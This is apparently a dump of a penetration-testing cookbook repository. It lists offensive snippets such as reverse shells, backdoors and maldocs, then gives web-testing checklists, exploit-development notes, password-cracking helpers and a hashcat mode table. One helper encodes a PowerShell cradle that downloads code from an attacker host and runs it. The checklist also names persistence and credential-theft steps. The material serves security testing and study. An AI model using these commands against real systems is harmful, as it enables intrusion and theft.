Showing preview only (3,172K chars total). Download the full file or copy to clipboard to get everything.
Repository: tasooshi/pentesting-cookbook
Branch: master
Commit: c0f1f13bfa81
Files: 151
Total size: 3.0 MB
Directory structure:
gitextract_leidmqwb/
├── .gitignore
├── Notes.Checklist.txt
├── Notes.Exploits.txt
├── Notes.Helpers.txt
├── Notes.Wordlists.txt
├── README.md
├── Target.Host.OS.Linux.txt
├── Target.Host.OS.Shells.txt
├── Target.Host.OS.Windows.txt
├── Target.Host.Service.AD.txt
├── Target.Host.Service.AMQP.txt
├── Target.Host.Service.DB.MSSQL.txt
├── Target.Host.Service.DB.MySQL.txt
├── Target.Host.Service.DB.PostgreSQL.txt
├── Target.Host.Service.FTP.txt
├── Target.Host.Service.HTTP.txt
├── Target.Host.Service.IDENT.txt
├── Target.Host.Service.LDAP.txt
├── Target.Host.Service.MSRPC.txt
├── Target.Host.Service.NFS.txt
├── Target.Host.Service.POP3.txt
├── Target.Host.Service.RDP.txt
├── Target.Host.Service.RPC.txt
├── Target.Host.Service.SMB.txt
├── Target.Host.Service.SMTP.txt
├── Target.Host.Service.SNMP.txt
├── Target.Host.Service.SSH.txt
├── Target.Host.Service.TELNET.txt
├── Target.Host.Service.VNC.txt
├── Target.Host.Service.X11.txt
├── Target.Network.Pivoting.txt
├── Target.Network.Scanning.txt
├── Target.Network.Wireless.txt
├── Target.Recon.DNS.txt
├── Target.Recon.Dorks.txt
├── Target.Recon.OSINT.txt
├── bin/
│ ├── direnum_combo.sh
│ ├── dns_cnames.sh
│ ├── dns_resolve.sh
│ ├── dns_transfer.sh
│ ├── download_files.sh
│ ├── download_int.sh
│ ├── ftp_server.py
│ ├── hexdecode.py
│ ├── hexreverse.py
│ ├── http_codes.sh
│ ├── httpd.py
│ ├── mac_oui.sh
│ ├── mitm_toolkit.py
│ ├── parse_gnmap.sh
│ ├── ping.py
│ ├── ping.sh
│ ├── quote.py
│ ├── scan_top.sh
│ ├── snmp_enum.sh
│ ├── snmp_public_hosts.sh
│ ├── ssh_enum_malform.py
│ ├── ssh_enum_time.py
│ ├── tomcat_brute.py
│ ├── vba_format.py
│ ├── vbe_decoder.py
│ └── xor.py
└── snippets/
├── html/
│ └── smuggling.html
├── java/
│ ├── shells/
│ │ ├── reverse/
│ │ │ ├── reverse.jsp
│ │ │ ├── reverse_bash.java
│ │ │ └── reverse_php.java
│ │ └── web/
│ │ └── webshell.jsp
│ └── utils/
│ └── jenkins_console.groovy
├── linux/
│ ├── backdoors/
│ │ ├── ssh_reconnect.sh
│ │ ├── suid_popen.c
│ │ └── suid_shell.c
│ ├── maldocs/
│ │ └── runner-1.c
│ ├── shells/
│ │ ├── bind/
│ │ │ └── udp.sh
│ │ └── reverse/
│ │ ├── reverse.c
│ │ └── reverse.pl
│ └── utils/
│ ├── bruteforce.sh
│ ├── ld_preload.c
│ ├── persistence.py
│ ├── port_scanning1.sh
│ ├── ps_monitoring.sh
│ ├── python_pickle.py
│ └── so_injection.c
├── php/
│ └── recursive_dir.php
├── python/
│ └── port_scanning.py
├── windows/
│ ├── maldocs/
│ │ ├── downloader-1.cs
│ │ ├── downloader-1.js
│ │ ├── downloader-1.ps1
│ │ ├── downloader-1.vba
│ │ ├── downloader-1.vbs
│ │ ├── downloader-1.xls
│ │ ├── downloader-2.js
│ │ ├── downloader-2.vba
│ │ ├── evasion-1.cs
│ │ ├── evasion-1.hta
│ │ ├── evasion-1.inf
│ │ ├── evasion-1.sct
│ │ ├── evasion-1.url
│ │ ├── evasion-1.wsf
│ │ ├── evasion-2.hta
│ │ ├── evasion-2.inf
│ │ ├── evasion-2.sct
│ │ ├── evasion-msxml.xml
│ │ ├── evasion-msxml.xsl
│ │ ├── ntlm-1.url
│ │ ├── ntlm-evasion-mssql-1.csproj
│ │ ├── runner-1.cs
│ │ ├── runner-1.ps1
│ │ └── runner-1.vba
│ ├── shells/
│ │ ├── bind/
│ │ │ ├── PortListener.ps1
│ │ │ ├── web1.asp
│ │ │ ├── web2.asp
│ │ │ ├── web3.asp
│ │ │ └── web4.aspx
│ │ └── reverse/
│ │ ├── reverse1.bat
│ │ ├── reverse1.cpp
│ │ ├── reverse1.cs
│ │ ├── reverse1.ps1
│ │ ├── reverse2.cpp
│ │ ├── reverse2.ps1
│ │ └── reverse_dll.c
│ └── utils/
│ ├── DomainPasswordSpray.ps1
│ ├── Enable-Privilege.ps1
│ ├── GrabAndRun.ps1
│ ├── Invoke-Mimikatz-latest.ps1
│ ├── PortScanning.ps1
│ ├── Self-Elevate.ps1
│ ├── SharingIsCaring.ps1
│ ├── Start-WebServer.ps1
│ ├── SuperPing.ps1
│ ├── Win10FirewallRules.ps1
│ ├── WindowsEnum.ps1
│ ├── base64.vbs
│ ├── ftp.bat
│ ├── icacls.bat
│ ├── info.aspx
│ ├── mimikatz-Invoke-Mimikatz-obfuscate.sh
│ ├── mimikatz-clone-obfuscated.sh
│ ├── minidump.cs
│ ├── run_bat.c
│ ├── run_dll1.c
│ ├── run_dll2.cpp
│ ├── runas1.bat
│ ├── runas2.bat
│ ├── schcheck.bat
│ ├── tcpwrecovery.py
│ ├── update_invoke_mimikatz.py
│ ├── useradd.c
│ ├── wget_ps1.bat
│ ├── wget_vbs.bat
│ └── winscppassword.py
└── xml/
└── xee.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.DS_Store
================================================
FILE: Notes.Checklist.txt
================================================
-- Source: https://github.com/0xRadi/OWASP-Web-Checklist
`` Steps
- Malware Injection (Spear-Phish, Web Exploits, etc)
- Reconnaissance (Internal)
- Credential Theft
- Exploitation & Privilege Escalation
- Data Access & Exfiltration
- Persistence (retaining access)
`` Persistence
- Process injection
- Binary patching
- Valid user accounts
- Vulnerable script code
- Avoid port binding
- Use AT to run your commands
- Good rootkit
- Be noisy on one to divert attention from another
- Change strategies to match environment's normal behavior
`` Reconnaissance
- Manually explore the site
- Spider/crawl for missed or hidden content
- Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
- Check the caches of major search engines for publicly accessible sites
- Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
- Perform Web Application Fingerprinting
- Identify technologies used
- Identify user roles
- Identify application entry points
- Identify client-side code
- Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
- Identify co-hosted and related applications
- Identify all hostnames and ports
- Identify third-party hosted content
`` Configuration
- Check for commonly used application and administrative URLs
- Check for old, backup and unreferenced files
- Check HTTP methods supported and Cross Site Tracing (XST)
- Test file extensions handling
- Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
- Test for policies (e.g. Flash, Silverlight, robots)
- Test for non-production data in live environment, and vice-versa
- Check for sensitive data in client-side code (e.g. API keys, - credentials)
`` Transmission
- Check SSL Version, Algorithms, Key length
- Check for Digital Certificate Validity (Duration, Signature and - CN)
- Check credentials only delivered over HTTPS
- Check that the login form is delivered over HTTPS
- Check session tokens only delivered over HTTPS
- Check if HTTP Strict Transport Security (HSTS) in use
`` Authentication
- Test for user enumeration
- Test for authentication bypass
- Test for bruteforce protection
- Test password quality rules
- Test remember me functionality
- Test for autocomplete on password forms/input
- Test password reset and/or recovery
- Test password change process
- Test CAPTCHA
- Test multi factor authentication
- Test for logout functionality presence
- Test for cache management on HTTP (eg Pragma, Expires, Max-age)
- Test for default logins
- Test for user-accessible authentication history
- Test for out-of channel notification of account lockouts and successful password changes
- Test for consistent authentication across applications with shared authentication schema / SSO
`` Sessions
- Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
- Check session tokens for cookie flags (httpOnly and secure)
- Check session cookie scope (path and domain)
- Check session cookie duration (expires and max-age)
- Check session termination after a maximum lifetime
- Check session termination after relative timeout
- Check session termination after logout
- Test to see if users can have multiple simultaneous sessions
- Test session cookies for randomness
- Confirm that new session tokens are issued on login, role change and logout
- Test for consistent session management across applications with shared session management
- Test for session puzzling
- Test for CSRF and clickjacking
`` Authorization
- Test for path traversal
- Test for bypassing authorization schema
- Test for vertical Access control problems (a.k.a. Privilege Escalation)
- Test for horizontal Access control problems (between two users at the same privilege level)
- Test for missing authorization
`` Validation
- Test for Reflected Cross Site Scripting
- Test for Stored Cross Site Scripting
- Test for DOM based Cross Site Scripting
- Test for Cross Site Flashing
- Test for HTML Injection
- Test for SQL Injection
- Test for LDAP Injection
- Test for ORM Injection
- Test for XML Injection
- Test for XXE Injection
- Test for SSI Injection
- Test for XPath Injection
- Test for XQuery Injection
- Test for IMAP/SMTP Injection
- Test for Code Injection
- Test for Expression Language Injection
- Test for Command Injection
- Test for Overflow (Stack, Heap and Integer)
- Test for Format String
- Test for incubated vulnerabilities
- Test for HTTP Splitting/Smuggling
- Test for HTTP Verb Tampering
- Test for Open Redirection
- Test for Local File Inclusion
- Test for Remote File Inclusion
- Compare client-side and server-side validation rules
- Test for NoSQL injection
- Test for HTTP parameter pollution
- Test for auto-binding
- Test for Mass Assignment
- Test for NULL/Invalid Session Cookie
`` Denial of Service
- Test for anti-automation
- Test for account lockout
- Test for HTTP protocol DoS
- Test for SQL wildcard DoS
`` Business Logic
- Test for feature misuse
- Test for lack of non-repudiation
- Test for trust relationships
- Test for integrity of data
- Test segregation of duties
`` Cryptography
- Check if data which should be encrypted is not
- Check for wrong algorithms usage depending on context
- Check for weak algorithms usage
- Check for proper use of salting
- Check for randomness functions
`` File Uploads
- Test that acceptable file types are whitelisted
- Test that file size limits, upload frequency and total file counts are defined and are enforced
- Test that file contents match the defined file type
- Test that all file uploads have Anti-Virus scanning in-place.
- Test that unsafe filenames are sanitised
- Test that uploaded files are not directly accessible within the web root
- Test that uploaded files are not served on the same hostname/port
- Test that files and other media are integrated with the authentication and authorisation schemas
`` Payments
- Test for known vulnerabilities and configuration issues on Web Server and Web Application
- Test for default or guessable password
- Test for non-production data in live environment, and vice-versa
- Test for Injection vulnerabilities
- Test for Buffer Overflows
- Test for Insecure Cryptographic Storage
- Test for Insufficient Transport Layer Protection
- Test for Improper Error Handling
- Test for all vulnerabilities with a CVSS v2 score > 4.0
- Test for Authentication and Authorization issues
- Test for CSRF
`` HTML 5
- Test Web Messaging
- Test for Web Storage SQL injection
- Check CORS implementation
- Check Offline Web Application
================================================
FILE: Notes.Exploits.txt
================================================
`` Fuzzing
# TODO: Upload phazz sources
~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read -m char -d
~$ phazz.py fuzz -h VAR_TARGET_HOST -p 80 -n 100 -l 3000 -s http:get -m ascii -d
`` Debuggers
`` ASLR check
~$ cat /proc/sys/kernel/randomize_va_space
`` Binary security check
~$ checksec
`` Disassembling
~$ echo -ne '\xd3\xfe\x86\x7c' | ndisasm -b32 -
`` Payloads
`` Test string (2700)
test_payload = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9'
`` Bad characters
bad_characters = (
'\x00'
'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10'
'\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20'
'\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30'
'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40'
'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50'
'\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60'
'\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70'
'\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80'
'\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90'
'\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0'
'\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0'
'\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0'
'\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0'
'\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0'
'\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0'
'\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
)
http = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40"
generic = "\x00\x0a\x0d\xff"
ftp = "\x00\x0a\x0d\x2f\x5c"
`` Pattern
~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
~$ phazz.py pattern -m ascii -l 2000
`` Offset
~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 68433568
~$ phazz.py pattern -m ascii -l 2000 -q 68433568
`` nasm
~$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax
================================================
FILE: Notes.Helpers.txt
================================================
`` Compression
~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/
`` Convert raw payload to comma separated hex
~$ hexdump -ve '1/1 ",0x%02x"' payload.raw | sed "s/^,//" > payload.txt
`` Convert payload to hex
~$ echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'
# 3c3f70...
~$ echo 3c3f70... | xxd -ps -r
`` Powershell
`` Base64 encoding
~PS> $text = "(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/run.txt') | IEX"
~PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
~PS> $EncodedText = [Convert]::ToBase64String($bytes)
~PS> $EncodedText
`` Sources
`` Update Git library
~$ export TMPPWD=$PWD; export GIT_ASKPASS=echo; for x in $(find . -name '.git' -type d | xargs -n 1 dirname); do cd $TMPPWD; cd $x; echo -e "\n\n--> $(pwd)"; git reset --hard; git remote prune origin; git pull; done; cd $TMPPWD
`` diff
~$ icdiff --strip-trailing-cr -H *.c
`` gcc
`` Compiling for GNU/Linux
~$ gcc -shared source.c -o executable
~$ gcc -static source.c -o executable
~$ gcc -m32 source.c -o executable
~$ gcc -m32 source.c -o executable -Wl,--hash-style=both
`` Compiling for Windows
~$ i686-w64-mingw32-gcc -lws2_32 -o executable source.c
~$ i686-w64-mingw32-gcc -o executable source.c
`` All files in current directory
~$ for fil in $(ls *.c); do echo gcc -o ${fil::${#fil}-2} $fil; done
`` Java
`` Signing applets
~$ javac -source 1.7 -target 1.7 Java.java
~$ echo "Permissions: all-permissions" > manifest.txt
~$ jar cvf Java.jar Java.class
~$ jarsigner -keystore mykeystore -storepass secret -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
~$ keytool -genkey -alias signapplet -keystore mykeystore -keypass secret -storepass secret
~$ keytool -list -v -keystore mykeystore
~$ jarsigner -keystore mykeystore -storepass secret -keypass secret -signedjar SignedJava.jar Java.jar signapplet
`` Packing
`` Python to EXE
~$ python pyinstaller.py --onefile exploit.py
`` EXE to BAT
~$ cp /usr/share/windows-binaries/nc.exe ./nc.exe
~$ upx -9 nc.exe
~$ wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
`` Servers
`` HTTP
`` socat
~$ socat TCP-LISTEN:8000,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; cat"
`` Python
~$ python2 -m SimpleHTTPServer
~$ python3 -m http.server
`` Python IPv6
~$ echo -e 'import BaseHTTPServer\nimport SimpleHTTPServer\nimport socket\nclass HTTPServer6(BaseHTTPServer.HTTPServer):\n address_family = socket.AF_INET6\nif __name__ == "__main__":\n SimpleHTTPServer.test(ServerClass=HTTPServer6)' | python2
`` Ruby
~$ ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start"
`` PHP
~$ php -S 0.0.0.0:8000
`` Perl
~$ cpan HTTP::Server::Brick
~$ perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
`` FTP
~$ python -m pyftpdlib -p 21 -w
`` SMB
~$ sudo impacket-smbserver.py TEST .
`` TFTP
`` Server
~$ atftpd --daemon --port 69 /tftp
`` Client
~$ tftp -i VAR_TARGET_HOST GET nc.exe
`` SMTP
`` Server
~$ socat - TCP-LISTEN:25,crlf
~$ socat readline TCP-LISTEN:25,crlf
`` Local delivery
~$ socat UNIX-LISTEN:/tmp/mail,fork,perm-early=0666 exec:"/usr/sbin/sendmail -bs"
~$ socat - /tmp/mail
`` Python
~# python -m smtpd -n -c DebuggingServer 0.0.0.0:25
`` IP
`` Conversion
172.217.16.14
((172 * 256 + 217) * 256 + 16 ) * 256 + 14 = 2899906574 = 0xacd9100e
127.0.0.1 == 2130706433 == 7F000001 == 1111111000000000000000000000001 == 017700000001
`` What is my IP?
~$ curl -s https://api.ipify.org
`` File analysis
~$ file executable
~$ binwalk executable
~$ foremost executable
`` Passwords
`` Combining
~$ /usr/share/hashcat-utils/combinator.bin wordlist wordlist > combined
~$ crunch 1 2 -p combine couple words > combined
`` Wordlists
~$ cewl http://VAR_TARGET_HOST -d 1 -m 6 -w wordlist
`` Extract last column separated by :
~$ cat VAR_FILE | grep -o '[^:]*$'
`` Length
~$ awk 'length($0)>4 && length($0)<12' unique > final
`` Lower case and keep letters only
~$ awk '{print tolower($0)}' VAR_FILE | tr -d '[0-9]' | tr -d '[:punct:]'
`` Most frequent words
~$ cat VAR_FILE | sort | uniq -c | sort -nr | head -n 1000
`` Keep only the lines unique to sorted2
~$ comm -13 sorted1 sorted2 > sorted3
`` Lines less than 21 chars and remove e-mail addresses
~$ awk 'length($0)<21' VAR_FILE | grep -vaEih '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'
`` Sort by line length
~$ cat VAR_FILE | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2-
`` Sorting large password list by count
~$ sort --compress-program=lzop VAR_FILE --parallel 8 | uniq -c | sort --compress-program=lzop --parallel 8 -nr
`` Remove preceding spaces
~$ sed 's/^ *//g' VAR_FILE
`` Remove preceding numbers
~$ cut -d" " -f2- VAR_FILE
`` Splitting lists by group/column selection
-- Ex. "22 username;password" or "12 password:password1"
-- macOS (-nE)
~$ sed -nr 's/(.*)[[:space:]](.*);(.*)/\1 \2/p' VAR_FILE
`` Removing duplicates based on second column with a single space delimiter (useful with uniq -c)
~$ sort -u -t' ' -k2,2 VAR_FILE
`` Remove all non-alphanumeric lines
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0A-\x1F\x7F-\xFF]" VAR_FILE
`` Remove all lines with control characters
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0B\x0C\x0E-\x1F]" VAR_FILE
`` Permutations
~$ crunch 4 8 > wordlist
~$ hashcat -r /usr/share/hashcat/rules/hybrid/append_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/hybrid/prepend_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/combinator.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/T0XlCv1.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/unix-ninja-leetspeak.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/rockyou-30000.rule --stdout wordlist >> permuted
~$ sort permuted | uniq > unique
`` Hashcat modes
# | Name | Category
======+==================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
100 | SHA1 | Raw Hash
1300 | SHA2-224 | Raw Hash
1400 | SHA2-256 | Raw Hash
10800 | SHA2-384 | Raw Hash
1700 | SHA2-512 | Raw Hash
17300 | SHA3-224 | Raw Hash
17400 | SHA3-256 | Raw Hash
17500 | SHA3-384 | Raw Hash
17600 | SHA3-512 | Raw Hash
6000 | RIPEMD-160 | Raw Hash
600 | BLAKE2b-512 | Raw Hash
11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash
6900 | GOST R 34.11-94 | Raw Hash
5100 | Half MD5 | Raw Hash
18700 | Java Object hashCode() | Raw Hash
17700 | Keccak-224 | Raw Hash
17800 | Keccak-256 | Raw Hash
17900 | Keccak-384 | Raw Hash
18000 | Keccak-512 | Raw Hash
21400 | sha256(sha256_bin($pass)) | Raw Hash
6100 | Whirlpool | Raw Hash
10100 | SipHash | Raw Hash
21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated
4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated
21300 | md5($salt.sha1($salt.$pass)) | Raw Hash, Salted and/or Iterated
40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated
3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated
4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash, Salted and/or Iterated
21200 | md5(sha1($salt).md5($pass)) | Raw Hash, Salted and/or Iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash, Salted and/or Iterated
30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
110 | sha1($pass.$salt) | Raw Hash, Salted and/or Iterated
120 | sha1($salt.$pass) | Raw Hash, Salted and/or Iterated
4900 | sha1($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
4520 | sha1($salt.sha1($pass)) | Raw Hash, Salted and/or Iterated
140 | sha1($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
19300 | sha1($salt1.$pass.$salt2) | Raw Hash, Salted and/or Iterated
14400 | sha1(CX) | Raw Hash, Salted and/or Iterated
4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated
4710 | sha1(md5($pass).$salt) | Raw Hash, Salted and/or Iterated
21100 | sha1(md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
18500 | sha1(md5(md5($pass))) | Raw Hash, Salted and/or Iterated
